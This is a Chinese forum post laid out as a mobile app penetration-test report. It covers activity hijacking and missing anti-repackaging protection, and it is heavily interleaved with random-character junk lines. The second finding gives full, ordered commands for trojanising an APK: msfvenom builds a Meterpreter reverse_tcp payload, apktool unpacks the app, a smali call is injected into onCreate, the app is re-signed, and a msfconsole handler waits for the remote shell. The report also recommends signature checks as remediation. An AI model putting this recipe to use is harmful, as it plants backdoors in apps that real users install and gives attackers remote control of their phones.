& h6 p& O& A: L |4 w/ q8 P% ~& Z2 ?6 C, @: [: B' i! t" x* _- @
2 R/ Q: W8 ^: o" [& l
1 Q7 g0 l- {, z# A6 H
9 _* o+ ]0 Z3 [7 g2 Y
+ ?# \3 q- w. k7 ?$ K' e1 O 表1-2 测试结果
5 {1 | b, N2 e1 \2 P. A
# a1 k0 V$ d; ~, {8 z% p7 }5 G
/ I8 h* g) X, k l' |5 H' [! g$ N0 B
- v, |. _7 p0 k J& y% I4 k( a; j% O
& R& ^) h' h" T2 E* A
4 a- Q, q# S9 Q" O+ ^- D9 A. _ 9 D$ Y' y1 T4 q
3 M: Z$ y8 l9 |5 S
3 J/ D* r- n2 |- h- x+ \: A" y
7 r9 a% O: b/ P7 L2 e+ k9 O, r9 V
J9 y) x! g8 J3 }7 T6 H' u- O! J& m7 w7 y6 S6 O
2 检测结果 3 h& {. m; t. l/ g, S. a- f! k4 w" [
* f5 j) e, m3 s% ^* K$ N5 k+ N! x
9 W" G. R( l: H6 z1 e' R5 w5 }0 P* t9 ?& R& Z! s, P
& l# P8 R* r- `6 }
) |: ?8 |) f& C* N4 z 2.1 某某某 3 x, k( j" a8 \+ `6 v6 ?# K
d$ L9 M6 D! _! f6 t, a! K/ B4 N
4 `' k# }- I5 ?1 z# M" m. i" @( ]% E2 O' j9 b
. W% G0 X4 |* s
* A4 W/ J3 v0 h: }- c
2.1.1检测目标
% {# R! Q' Q8 z9 ?' n- s& ^( Q: k! Z/ ?5 |7 w( r* s
, P; |' x. z& H$ W7 b' }* G: M4 g8 s- y: e9 ^, L
$ b( N6 @, a7 M5 p L4 Q" Z
+ m$ x$ \( d6 f6 P 目标地址: 某某某某某某APP - k% c. }6 Q" C) a6 y; W! i
8 w! k& F6 u/ z) n* b! i' w ]& n
9 r# z f! [% |: b# W& u' I; i" j# k/ g5 N# O( N; b2 q
/ M p9 y9 A3 @$ E! S
2 S* P4 _& ]# ~' b, X 2.1.2检测结果 * M C1 O0 u0 X! @8 K& `
. }( }7 G7 i& x% u8 ]; S
: c8 C( f. E% ]3 ?
$ j4 Y, u3 j$ A5 j* Z% K
4 m# P" \: _: u- Y/ F9 l; M9 H2 W/ Z! n: [! X4 I; }: `
2.1.2.1 8 w* Q: Y, i# f2 a4 I5 T. h
, R1 g0 y# F' L: k+ m
/ c" u# M7 ?. n9 }1 o" e0 q
* P% q: J- R: J, S: A$ o
% Z4 O {4 V4 J6 H$ X3 Q
2 [( S- H1 ^% B) s1 o/ l S 漏洞链接地址:某某某某某某APP
2 r6 u- C: ~" y7 i2 w+ M9 r( T1 W3 h4 R; \0 B$ K
* M$ N/ ^5 X" I7 w) h) R r- M+ j7 g' u1 {2 x9 c. j
! [: L7 G9 f! y8 s/ G) t! l$ }; _7 D
. q' o7 q( l2 ?. ~5 ^. i8 _6 O0 t
* Z$ |- `+ j ]# |5 d) _0 ?' E8 i# M1 z- }
$ u6 x: W2 w) \% l6 Q' S$ H, h! w" }0 U% X4 |/ u
! B2 z. x4 i# y% O2 E9 d; e9 {% h& u% i3 ]* m
漏洞分析及取证: 1 y6 Z$ p& a) N; L9 A/ O& u1 w) y/ n2 v
4 U/ c. c5 W, }
7 r& w. |8 W( t" V D
* V2 |. G5 p- F, i2 O
' c. N& H$ C0 ~3 f
1 f" b. u6 s% H
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 e5 O. A6 o# ]* W( q k! P, ^
5 y6 l+ D; ~3 V# B ?2 y
- }4 T+ l) [1 b
2 n v* C$ q9 R* w5 f' Y ' D4 N0 f0 D* u: Q0 e7 L. D1 c3 J1 C
/ f+ q( H$ i4 l0 E/ e& o 
" F& U9 @0 J6 O
! i4 I8 Q9 `% d! {8 ? d& `& Z4 J
( A# [ z0 k+ S B' @+ e7 d4 T2 Q4 r; k8 \
6 x; w- f9 n- p7 w
@/ G* |- M, ^: |7 R) l6 l& { " c3 p. d5 a; \4 k1 _' g; a
' L; A4 N' \2 K. r
5 O* B% |+ o2 J& ]2 h* `( ]9 H* Z; K* J3 M7 M w) S5 m
+ m7 X/ t2 q$ o, t
s% L+ K R* t7 }; X- U! M6 B# B 
. k# e2 ~% u. R& F" K( G: y" ~- b/ n
6 H, q* p, z6 h, _& N
0 z( y/ }/ {. m& @
; ]* E) u3 x8 ] S. w1 @' o/ t) C# H5 ~ W* b
$ a { T& }. ]$ H/ B6 Z
6 n: q3 k. t) \$ T. e* G
! Z! ?7 p7 M1 O; W" {! n. x8 h5 G8 i* G
( a# _( V" V+ H, e
& H. _; C; I: N' i
' K5 f- B- L( z
3 D$ v) V+ X4 {+ Q, U" {% k! |
, Q' c0 K' S9 E2 D* k& F( m* K2 z& \# L$ M6 o( N( x0 i: x
0 `. V% h* k x8 u! t3 F
$ f7 X; x5 Z' I& d 漏洞危害:高
/ q! V. b! s% n
+ Z# d1 o; ]- H! G, Z" n
4 p8 a1 k; e( l' v
& o/ C& ] H3 [9 B3 x
7 X5 Q/ p' d4 S# y0 Y
, c% z: _; D9 D; H* j, m" ]
) \! p# |" U! T1 q4 }6 g% q5 i- `0 R: h
& l& u" w6 H1 Q g, |, H. n5 x
, [( ^+ L, x F" K2 R1 ]% P9 ]
7 O0 d. D) L5 j$ h1 A
* o( n; \& ?$ O | - n$ c. c, b# p
& F! ^$ x$ \5 q6 c
2 d9 T5 y K) Y+ N
% u* c$ O7 T! K# \- l. T" P 严重程度 7 J; x- P3 Z4 u7 w4 O7 X
* f8 n" D- @$ V3 U$ `
7 X& ^: G$ I, F# p% @
& f$ `6 I) \' `6 N |
0 q/ Q# A- I' V" w8 a
& d9 M1 ]& u9 f' A9 `
" D+ S4 x( f/ ~% C+ L4 q8 K$ q4 R' `4 w1 S
7 {) w/ X. |3 ^# {4 u: ]
4 f" L* t, _5 m
高
f5 |# M# p; c
6 w5 W) [( B3 g& ?
7 x9 _2 O' G$ m L" T0 ~+ a) t
9 N' D% o+ M3 g5 [6 X |
' ~0 L! \: x# j1 k& |9 i9 x0 O
1 F2 T3 N( T' L" h9 H# {
& ^6 n; v8 T q
3 a. S; J& n1 f! K4 K# `8 b
$ {3 W# t! ]2 A7 m$ L5 |1 F* L. w4 N9 U/ y Y0 e( t# F0 t1 s& K: ?; c
■ " d/ y/ a+ u+ f8 B* i, q" L6 D, x' r
: M8 p1 t8 _$ C+ t" f P 4 K( V1 Y9 {$ L- J% s( p, L, `* |
& y6 u6 ~: w( |, }! ^ | 9 d; l- ~5 ^# x0 G
0 g: H7 o9 W% }
8 L' j+ p( ^9 O/ N3 G
1 m1 B3 }3 y+ M5 Q/ ]$ l( U( T7 l' C % |. d4 R! z* ]; r0 }) M3 K
7 U: h. S& X8 e" A* x1 Z3 X: U! r 中 7 h; T0 @; O$ j$ R9 n# C$ I# E
A ~- h3 _9 h" i
* i0 X7 d0 F. a S2 b% m$ }+ C( W" Y, A# U% h9 W+ D
| 3 g! L) H( K! w6 T6 N: t( x7 |3 ~: `
4 }- u2 m/ }' h- X) e r+ M# c, F% Z3 z" Z8 p
0 M m* c# b0 @, P) t$ I$ }# r
* ]4 Y, x6 p2 T; B# ]1 P4 o2 j
* A/ h( s0 N1 t 8 Z) Y: {2 P; q) m, q& ]
C2 {3 G$ H3 h* {1 m
8 r/ n8 |4 t& N& F3 \9 N
# N: m# e: v' ? |
. T* [3 g' W( @: w1 e
! h; R# [4 w/ L3 E! \$ k
3 \) J6 }8 A/ q. c
) B- W# h1 I) g z% c8 u; G+ e" M5 s
7 J0 {5 G2 A, d2 A* m0 t9 A
低 1 |) O5 f1 m9 N6 S7 L
, V- T7 m- o; ]" }4 p' a" t; _
1 x0 v7 X6 c: V5 ]: K3 p u1 Q
a9 y$ f+ u. r# o T
|
4 p1 `5 u1 w3 x# l9 q' C% U, `! o o! A- X3 m K U
. w) |- `$ z, F- T) b: y5 N k' a4 D4 E1 o1 c2 v* I; U9 a8 q7 h( g/ q
6 U$ g( N$ O0 Z0 \$ S$ W0 t0 O* F: S8 f
/ a1 q6 y* |/ y; h7 H
2 g5 H n% }6 f7 n8 \
) i9 {, A |: f7 h) x% I8 w. [2 v2 ^& {' G& b* H0 W
| 6 `# R2 g& L2 a: q
1 n) F% ~5 u/ M5 e$ e
0 G3 g1 b) \7 w8 V9 i" h2 E% d& O
, H3 P7 B3 C2 J6 V) r
1 D f, [( u0 E7 r2 } F# m- S
8 `; @6 _# ^# d; @3 X
, l# j* S% w$ c' S: N
- e: q5 y, U% F0 {8 Z% k0 h
9 v G; Z+ C, {- {5 ~; r- a/ n. k
" }( o5 `! @3 D8 G" w& j: e) W* D! W6 F
! J3 V7 ?/ T9 W1 `* B# F- u
/ t: Q3 A) s) k1 d# u- p
& g0 w, E0 s' [0 R+ V! D; N/ x7 k
% d: w( e! N% D2 T5 h% h
! b" y6 U% C W: Y# t& x! U q
" v; N# V2 D6 z" N5 Z: P8 ], a9 v! ]0 a+ r# z) _
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 - a }( ]$ b3 ^; p* _- L8 y9 [3 l
T* O# e; R, I+ h9 _& Q, u
$ h% j; N4 c) v" ^- p
$ ^9 {2 g t, c8 t' W# R2 T% h# N 4 k; d3 G3 p! C+ M* t5 Z% [
! @6 M% Y7 p; K: Y* ?4 l, B
6 [8 k/ e# z# n' ?
. T# \; E* A0 {
- t/ P( n( n$ M6 z4 [$ @: x* b# t# Q) L2 p4 x2 \! w
8 x$ q! e" N6 F. f! [, L& P: z8 G% R/ ^& i( s6 l2 S
6 e; X1 I P1 N4 \, i
1 N3 j2 l5 B7 }, K* b: ^
* c: s* u+ w# M( i* @6 i
z" L( M. w2 i$ d' V, K ; R1 M$ X5 ^1 |% Q5 e2 A( T
; B( L* l. {; g8 Y' S
2.1.2.2 H& g, w- [6 b- g, M
7 ^/ a. Z7 ]6 t8 h$ J
2 w0 p- Y4 M5 T, z
" K0 T9 I n. D* c g' F7 h9 u
5 w) y3 Y. i1 X" ^& L# _0 |, {' y; |6 }2 B
漏洞链接地址:某某某某某某APP
& e+ b* Z& F5 _" T4 [2 u; _- a$ \% c6 G4 S+ E. x& Z3 n3 _
* j# M2 x3 D2 d$ f. P# z0 j$ {
# [3 d, {/ x: }* ]
% L% i/ B. d6 a g' i4 B0 p
, P! d0 R# D" {' L, M4 ` 漏洞分析及取证: ! B! s, @# H$ h( \
' t6 h, h; P) q3 P8 D$ d8 s" f8 g q
- O, N- g& Z! m9 s0 f0 s: m5 }# [8 L
O4 c D1 S6 r/ ~2 O9 {* X% a3 d
- u4 ]7 _8 J* e D 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
5 M/ ]. ^& h3 A7 o9 {' P* t8 O* P
! p0 d, a$ Y" Y* h9 q6 n2 O: i/ \* ]+ ^
* Q G) ~& f2 r9 V9 @- m0 p
: [5 ^8 X) j3 a" p- c0 M: k * b! ^& o( [# Z5 ~* S& f7 z
3 T) a5 H- z M5 O9 ~ 用Metasploit 生成木马 apk
; c1 B" o. z$ {1 F" o) h" D( ]- }) W- ]; H/ y8 l
. U) c0 D7 N7 r' D o( R
& Z) ], U7 W7 w- s, `4 t a9 b 5 U9 Z5 s& Q+ y4 R9 Q8 i5 c" z
, `5 P# F, U3 J+ Z msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk % L7 U7 z) I+ e: o! Z# }& _& ~
# V2 z: g4 Z3 [- ?9 T; |" ?
# I+ U8 _5 S8 P" G. e; N: q" S4 s2 T4 C! Z
/ L; T+ i$ |: t+ D- g5 Z$ O% W; Q# T6 ^+ A
反编译目标apk和木马apk % j- M( x7 ^ y7 F' w$ R- D1 J: ]
# e4 `* i# v o3 v7 N6 K- s
: A$ \( m. @1 V8 z
: s$ l- l6 X/ w8 k* D% Z & h, F+ G w. J1 P3 f
9 _4 Z* c5 [% w
apktool d target.apk
- n( j. i" J- ^( F6 E
3 w3 `6 K, c G( \ y) D
apktool d cockhorse.apk 5 |/ O' @# y: z. v; I
, L& I3 C" ^3 }" r3 c# f
/ @0 r' O n* T
. s% D4 ^, ?, c & N, B7 o6 D! j5 V/ U3 w3 k
0 W3 r8 ^4 r7 P7 V( n1 f2 r 木马 apk 注入目标 apk
9 z- Q. |% @1 c- A0 D( w& P% a4 Y3 k6 }" {( v" |9 B
/ J3 ]! B6 Y3 v# Y$ m- {, t
& P2 a( G8 d f5 w8 p ^( @
% w1 y3 L4 ?' p1 }) \6 r
: B) D6 i* A6 _8 N; j3 L: ^2 q D
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
q; I2 Y9 N# z6 o- j
% H/ ?* r" D; u3 ]% j* ]
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ) V9 J" V% M' P* s
) W# v* B. N1 p2 q1 ~3 r
& \" u( P; k# O" n) R: n6 _2 u9 m
. Z5 ^; t3 S- {3 F* D$ c
' a% y* J' _$ q l0 o% }0 \* N1 v+ f B, u
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 c* x$ g) b) b8 k, L9 F8 A* k
# b2 v! [2 X) O6 ~; s
! ]! O% ?6 h( P! m5 V' {& h2 @5 t% y* S
) Y" O# n! `9 a$ p$ f# s
3 Z% E, l2 |0 i 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 * u3 g( X* P/ {- x/ |6 Y& f. g. }
0 g) E: _* h! \5 b0 X6 G7 q& F ^
* `; c) T2 u* G$ ?6 F. m) B8 |& ]/ J3 y6 a
4 R8 G* f' h7 a2 l- |* {
u6 F' T4 J/ v7 M9 n+ ?$ | 回编译生成最终 apk : G' L; N& x. f
3 i# C0 N2 N3 F$ N
8 G1 w* G7 m! W5 N
* K* v ~7 f/ \/ l/ @$ O' X8 I
) H0 f" g' _! S8 w! k
" S! _. Y* K3 V4 \/ A& O6 \4 x
重新打包
; a2 w0 w+ Y5 _2 Y5 R& h4 B/ O5 |4 l0 J( k3 C
$ {7 \+ P8 x/ w' a! Z2 Z4 ], s, j8 c7 \5 b, ~
/ x( T: ^& X3 n8 v" b0 ?" O
8 _! ~5 \- ], W! j$ t2 ] apktool b -o repackage.apk target_app_floder
* @; g1 n$ Y( F* m0 E* n/ l/ _/ T3 j. I, x& h' H0 U% w$ m" Z
% h9 u0 W- V! p% o: f# \
) H+ A& W6 X$ y2 \
- G- E, b O9 E) u5 x
/ z- n3 p) \) H7 V" H* F 创建签名文件,有的话可忽略此步骤
7 W, ]/ K* Y7 D$ H1 T1 G3 ~* `( G3 g8 V* ^" F) D; J
" n+ }- \7 O- l, C o
7 M- w: H- @4 O8 @2 P
* S" a' D9 @+ ~$ q" L, _
% Y: `0 {# ^. M6 ?( V9 } keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
6 v6 `" A- i" |0 O' |4 x9 {( h' J/ I1 y! Q4 B4 r
, z4 N+ ^2 G6 q
9 k3 k; R- w& S& C. A* n5 t9 r
( ~% y! n I1 R$ E* V5 y( R c* ?# B3 C# s* l% Y& ^" i7 m
签名,以下任选其一
7 H1 U8 Z3 \6 k5 r1 d
3 n* X! m. l+ E$ U. [* k
4 |7 x2 q* J1 L/ G p: Y1 `7 h {
6 ]0 \/ z' S8 Q
6 {4 k4 m) {$ V" {0 r
" l, C6 Z* {7 D8 q3 M! r+ Y jarsigner 方式 2 f2 z$ j& f6 t
# N0 I( }7 u" s/ w% Z" v& Z
) a/ F4 L4 W. D. B0 C5 a
" W8 `' M k1 m3 y: f+ m4 y
c4 J$ @! y9 f5 V$ l; U+ c4 l0 i' a: S" C; c& N
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
% l* y! k0 j( w9 z, G
- `$ _% e9 `0 P3 g+ R# _' ]
- b$ L5 i2 h) Y! h# W0 C1 }% g% n5 d
; ~( L' P- u3 |; C6 e# ?. F3 Z% q" r7 s7 ?, z7 q0 d$ m5 W( E; ^
apksigner 方式 / J/ X; v+ F, b2 ]. _
' h4 R+ ^/ d8 F3 l
& s3 p: e5 @( i8 q' J+ a* s. ^ o
7 Q. w3 ]$ t- t4 h0 X( s' w m: i O, q! y* Z
+ Y0 f7 q- w9 @8 o+ @
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ) b; V% t+ |1 y! l& h& N' x
. P2 p- d; ?9 Y* h) s
( j8 X0 _ \3 U0 M, y% b
& I5 y+ l R2 }* o- ^" n . [$ j- X9 i9 T; k2 K
9 {- G2 Z( x2 q; O) |
如需要禁用 v2签名 添加选项--v2-signing-enabled false 3 K* C; J: W! e [& d. R
% w) i0 N! D; {" z f
5 `2 E N0 k3 e I0 R2 c. M$ `/ k! z
7 ]; E8 n/ v1 i: W, n; E' Q) v1 ^
/ h6 _( W7 L$ }
7 W4 _/ a/ u z6 N7 l% e
验证,以下任选其一
; `1 x! g1 N$ I( ]. ^9 h
2 a* G) \$ N% o3 ]* y# z7 L# X
1 } l2 m: P# ]
: m" q a$ V3 L A( \6 t2 |3 P
3 [! p4 ^, J3 B1 m, ?0 D) u1 H; P R5 X* O0 E9 i Z: p' A+ @
jarsigner方式 " o. Y, _! y' l* r3 p# m3 F( n
# M! R0 k8 Q/ [& v7 q% S Y. L, F
, J n& C( r5 v; M( g8 G- ]4 Q) _ e
' v# e8 F' M4 {2 s, ? n" i: l
+ B- G7 O2 S5 I* z! ?
& ^8 ~* k8 t6 G* {, [6 O& a jarsigner -verify repackaged.apk
6 H) K; t, M$ B# X( V: B3 T2 q
& U |+ a4 O- c& R6 t
# d6 L, k7 Y- |' _, M8 c% W4 |7 V' o* E
U! d" F0 Z1 J* r/ V* g8 h& I
_) Y/ I8 r: K7 K% ^ apksigner 方式
4 K0 y% S( m" u) o$ p3 z; U# ^/ H" ^ M4 A
" c D, m( v9 y% m
+ J8 U/ b* Y* v' c) V
4 Y9 |! Y9 G1 o2 q5 U3 l6 p2 V; [5 A6 b
apksigner verify -v --print-certs repackaged.apk
, r2 V9 U/ l) N* ^9 O4 A9 z$ h6 n7 \0 ~% }$ ?& _: I
; L/ q+ f) e6 Z$ l% a; l) ]
+ ?" x$ n5 a0 d
$ w8 x3 d% A9 d8 p/ g% s5 k0 o: \& c9 f0 Y0 e9 ]+ c
keytool方式
8 S% D$ L/ U4 B ~+ G7 L' o" k
2 U. C- N7 n; L2 P$ S G9 Z
: W- D7 i, f3 S% X3 d3 ^) W( y
. F7 F( ~$ |( v, T
( T6 b* v& u H. ^5 q' N keytool -printcert -jarfile repackaged.apk
' L6 F( r' S3 u
4 S! Q3 a' Q: s' F
+ H9 }( ]2 F; S) E, H: L; w7 m9 q4 \! r/ B! h$ Q9 U! @. `
1 \+ E S% |6 _# L: A9 U: [* J3 t! `4 U3 R- T0 F- s( L# E
对齐
. ]' ]1 y1 C8 M" m3 ~" Z% H5 M# @. ?+ l [$ b6 H+ q- \* i
6 I1 V# c2 v* }4 w' h/ t4 U; z' o, I% p2 ?0 b B! F) B0 G
) w; d6 v! ^' q
# Z1 W* e% c% u0 p2 M( B1 w0 B6 p 字节对齐优化
3 w6 R, a! P3 b: X" _
2 Y0 X- H% ?6 y; v. w& K3 _
: l* C9 [. l) v: M7 \
# ~4 P$ x) @+ L
* H6 q. Q/ v# F0 [+ f$ {
2 P. w; H, I- C zipalign -v 4 repackaged.apk final.apk % q" M! a g$ z# Z% @! _2 a; V- r
( N& x+ x2 B4 W
4 z6 h8 X+ N2 n7 |" q
' {6 O, K" ?$ }
8 q! x; F4 v0 c' `
: F& P9 z V# B+ c0 |; _ 检查是否对齐 1 m- E; t) r4 M
; n2 D+ x; m1 B4 R
# q0 G0 \) _+ v0 E" t% }1 h5 x# m" J1 ^" R
+ L" D* ~. S$ O' N& F1 s L* _6 e) \, v9 [. Q" {
zipalign -c -v 4 final.apk
4 m3 _6 c* W) S ]. o5 K8 u* |9 Q, k6 t7 S* a
$ W' k J8 \$ R$ {! C4 E0 V: Q% `9 |, X
) }: x8 F$ e' s; {( r
8 I( }' S( |7 y! ]" A 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
6 B7 ?7 i0 @' Q: N, @0 L7 [
& V4 ~, i( n) y8 w1 T
/ S) f5 f. N' j6 [% N# x# K4 [ f
) F! J, j& j. @6 q% a! O
: O. \9 s6 O; ^# O! J- w0 Y/ u
1 A1 ~: C$ ^# Z% ]5 C
启动Metasploit控制台,配置参数等待上线
: w$ f, [3 r8 Q" P: `) p. a1 L( d. K/ s+ u9 ]2 ?* a
4 Z# f0 e4 B7 x: o
+ a" u# E3 ^ d5 g1 _8 R# V$ |* ] ' d; S9 C, h+ k' Q8 m& D
& R2 a! p$ x# ~# _% ?* d9 c
在终端依次输入如下命令
, V) B Z$ ]$ C
, P( L1 i9 G" a' N8 f' {; o
) F" j1 v# a' r( m4 Q6 E
! j) u9 L! J* }8 [% \/ k
) N6 z- h8 J) m/ ?9 Q5 m0 S: b) Z D, ]! x; k- U3 @
msfconsole * a; ?+ ]$ x9 U3 a: g6 u5 o$ |6 ?
2 P8 _6 N4 A- w! A9 [) u
+ v! k! q1 k0 @" L, d
0 B1 B" b: F2 o/ f- H# { ( ]* P, \4 Q: t( a# ` ?
& z* G) G6 m% _6 y
use exploit/multi/handler
: m9 X/ e E$ @6 A6 r" t
2 B) `8 T; r4 s2 T* ]
/ _8 j7 H$ [5 D$ H5 N
2 D% S* b6 D6 K# c( P
0 L# U9 j% i# i6 ], n3 I* i
/ U, K; I1 k/ J1 e9 ` set PAYLOAD android/meterpreter/reverse_tcp
# e( v/ C1 k6 N
/ _! d n3 D0 b) O. d- X. j
; w: y+ f `9 b! Y7 ]$ M8 s3 _" P9 c8 E8 t
6 m: L8 [9 t' e! O/ C L
5 t, ]! i: S, V% F, g( L
set LHOST 192.xxx.xx.xx % I" s4 j( o6 m# [8 y
! O, ?. @$ n/ T! Y$ D0 e
. U) J' R' H, Z& N/ t6 _: x. B- e9 \' T3 A; [. ]
, H, p' J7 N i+ R. }( ?2 D
: U- w' a( c" q set LPORT 4444
! H+ t3 |9 ^$ r$ Z$ C2 x: ] ]" ~, g0 B6 b* @
1 g: E2 E/ b& q1 { R( O3 v& \) E
# R7 X b0 T2 x) G3 m1 D
0 _( s2 R9 t. l& ^7 l5 l: I& \+ o; d* E
exploit
( f" Z3 |8 {: W+ J* _+ d' Q5 C( J
# }- ~* v7 M$ r! q5 Q) q, Y* `/ ]" i0 q* x. A! n
) q9 D4 r) Z3 @) U( g& `
5 C2 f6 F) F3 T1 i. Z6 G 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
: B5 Z0 g- T1 b+ A3 D/ T
( h9 V, @( t; h, Z
( d7 Y9 l5 I& o6 s+ @) _$ H9 o3 v0 I" [: p, s" n
0 a) w) B7 }" E
7 D/ \7 S( e+ d I1 A: H% u
漏洞危害:中
4 I. i( p" m! C" P1 L0 j U7 u6 W V- W2 R" C5 a& J
' N6 `& s- Q7 G% c
* M2 y6 M( } K* ]! b) ~6 e2 J' E
! ~$ U$ ?: K; {+ k; q$ s- u( g g% f% D% V& Y* F# h2 W5 o
- F: a0 A5 N8 A# u0 Z7 P' ^ J+ O$ A) `. z3 X6 }3 J! \
5 Q4 n8 _9 H, h7 r* d, s! U& T
6 {; ^/ ~+ Y2 v3 r6 \# Q
' {5 B& Y0 F8 O0 ?* t/ [" b! { h; o, p
( z+ ?( k, g' @/ E, y
- e2 j. Q: x5 W; ? |
3 Z3 \5 h5 n! ~* F5 }$ `% C" N3 l) F _4 c! r
( p6 q6 C% ]- ^- I) A
* S$ m) E7 `& S. `4 O$ R0 i 严重程度 " j& L0 h" {& _$ p' s2 z
( a+ T4 H9 S0 |. ^1 h x+ g# T ; @* r6 j5 g2 p, Q e
7 Y+ Q, a' ?8 y* W | / N( c7 Z/ E0 K y/ f
1 V" @0 x8 H0 o: h& g
7 O- n: D- P5 W- \$ r4 }; {/ ]9 Q
/ T1 U! ^* }! G1 {( f! r* }
% ~6 [( A3 U8 q I; Q3 ]( _9 |4 w
高 , f# Q( l, |. ~6 U8 J
0 b' ]: U0 b# _4 x
6 R- P& p% ?* y* D/ Z9 d' _2 M: Z# a: v0 W: }6 P8 } @
| ) l2 k% }3 `( B( k$ o+ ?5 O
& R ]+ w0 [* \
$ w" s& k8 y! Y/ W) D E4 M1 I" Y; g+ U6 W ^
. V$ k6 R. V- Q* }% o
2 p4 y/ j# b3 r p L ■ ( S9 w. U! b( t' P3 w* K! d
1 x+ P/ t9 f3 S& r& D* D
! t. w0 W1 {% j7 N6 y* X5 z
# W0 ]8 Z! h V$ r9 B; U$ ~ |
6 @! T- |+ S% j1 `) Q# X( n# J: o6 q' M
2 g( u7 E, R7 V& [1 D3 h; a" X* q8 }$ Z- g
% W( G6 i" e. I
4 T2 P* u i- s8 j' \9 w, N; m 中 9 |1 d; L& I) I E s9 w9 f$ x
& D% y6 o- O& G# l0 p
/ ~/ c, f/ H9 ^1 J8 Q: ?/ d. H# ~+ \/ s+ f" E# d" l3 j
| ! e% D3 |$ l& a2 V* f3 R7 |4 \/ ?/ w* Q
6 y2 r+ j& w4 S j2 e
9 u& \, y9 P( O0 I" [
6 x3 M, K( M+ M1 z# I
& W' w2 ?$ h( G: P& e# E! |6 ]
: V1 \( C' E: u% N5 w& ^
/ Z" p; g4 ?" {5 j O" B1 P$ {/ K+ C1 y: w' p0 G
. Y- g4 I0 j6 d b6 I) T' Q
6 d9 A8 L% t6 e* h4 m" g
6 g U) }) T( x: _: k! X+ \) @5 ?( w* W6 N
|
. G2 P1 I: W3 Y% q5 J/ J
6 u2 c0 O7 r3 C# _/ |; _9 N6 s% Y . }1 \! s7 D& j. |+ i, s
/ Q# |0 [8 B9 s9 m' M * I2 x+ M* [! i c# r) M
- a; N8 }, V. V6 @) J/ F- T: P$ J! u 低 8 x% @2 I+ x! n) Z; O
1 |: O% i1 A2 x' o3 W2 I7 U& I 8 W; s5 x: j* R: a; V# a
: Z; H4 ^0 a- m+ G9 G! F! O4 C | ; I' L6 r& A8 }
" Y. _; k9 b0 _. i- |# ~5 N$ U- R6 O
% y- y. R$ D0 j( `
9 a) @ W# z+ B! S
; }5 Q! J2 h& ~6 Y8 v8 v
/ k- q+ S. o2 J* n& M l; }' F8 H+ E! a
2 {, Q I0 n9 W% }- _* L
6 S3 S- e& |7 w8 K. T
" K. y7 {' [( A$ U- `2 [1 s 3 S$ E4 A9 Y# t1 p9 u( W9 ^
; d) \1 n% ^' \0 ]$ ]4 F) p' B | * b/ R7 c2 }# ?: C# S
: O4 i! ^, w& T) K
% Y1 W2 f5 r4 M5 m9 ^1 M# ^4 S
1 L1 f! y) P5 [; [ ) q5 N* t+ G1 x9 _! A
% G+ l2 E5 U# w# r* ~ d X# d, K" P
, D6 i2 C$ O" X5 k
, S8 I" v9 |: Q+ J8 T& R& w
+ g1 {: t& ^( t$ R! ~7 H3 q6 l% E* a+ O3 N
$ M' ^/ v0 P* ]
9 i- T/ ?$ k" L- R3 n: G6 k
2 p' M9 C% x4 C u( T6 O9 {9 W6 H) p; k, }0 P$ @
- ? d/ U8 w* i6 i
; H5 r6 R7 d& a6 i8 l
2 n2 ]% N, X- V# r
& ]( G1 }8 v4 R3 c 修复方法:
% Q; m' B% O4 W+ \; h$ K7 D/ c* z# W8 R' {# ]7 N
3 [1 T; T' W. k I9 m* |! `& R$ C( G0 ^! D) y
0 ^, d) |7 R9 h5 [
Z' N& t& m# g7 S. R0 m# M 1.在 APP 启动时应做签名校验防止二次打包。
* K% o4 }) }; q+ R, Y. I
( \2 r) E3 `0 o& c/ C. e. v 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
7 a( w, h) w1 u1 |$ j0 x6 J4 d/ _9 m& w/ c
5 [: [* Y& _) {5 H7 n. h1 R4 d5 r" n$ Q7 B' `
& I6 Z0 Y' W) k7 r. m
* d4 Y9 @6 A4 n4 @
" Y5 @, g) J$ Z' F
- k# b$ _. v3 T0 v: K
$ I; q% c- R3 _0 h
! A8 D7 M( o# I- l- s% I& T
) }# j9 F8 L) I: D( S5 {2 E% r! U7 P8 g+ h3 {9 o ]4 r
9 N# {5 C3 K+ j0 p8 C$ t
$ M* K) J' }4 K
9 ]7 f6 \; ` [) [7 z' l' A' a4 _! G1 \5 l$ {( U" e% o) n
. c3 Z% [* L1 k
. O4 Z6 o4 f3 b) c* i2 B+ I& v) i8 H
. R; M3 S, E" M
7 `9 Y- R) j/ K6 m# Q' C% y6 e
发表于 2022-6-8 20:32:44
收藏
支持
反对